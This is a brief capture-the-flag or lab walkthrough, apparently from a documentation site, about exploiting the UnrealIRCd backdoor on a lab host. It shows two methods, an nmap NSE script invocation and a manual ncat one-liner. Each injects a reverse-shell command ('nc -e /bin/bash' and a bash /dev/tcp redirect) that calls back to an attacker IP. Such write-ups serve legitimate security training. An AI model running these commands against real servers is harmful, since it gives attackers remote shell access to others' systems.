Exploitation

Method 1

Set up your nc listener and run the following script on nmap 

nmap -p 6697 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.28 4444"  10.10.10.117
Logoirc-unrealircd-backdoor NSE script &emdash; Nmap Scripting Engine documentation
Connection Established!

Method two

LogoRFC 1459 - Internet Relay Chat Protocol

We can manually exploit by gaining access to the system with ncat.

LogoA backdoor in UnrealIRCdlwnnet
We get a response from IRC via ping as shown on the left hand side, vulnerable to command execution
echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.28/1234 0>&1' " | ncat 10.10.10.117 6697
PreviousScanning and EnumerationNextPost Exploitation

Last updated

Was this helpful?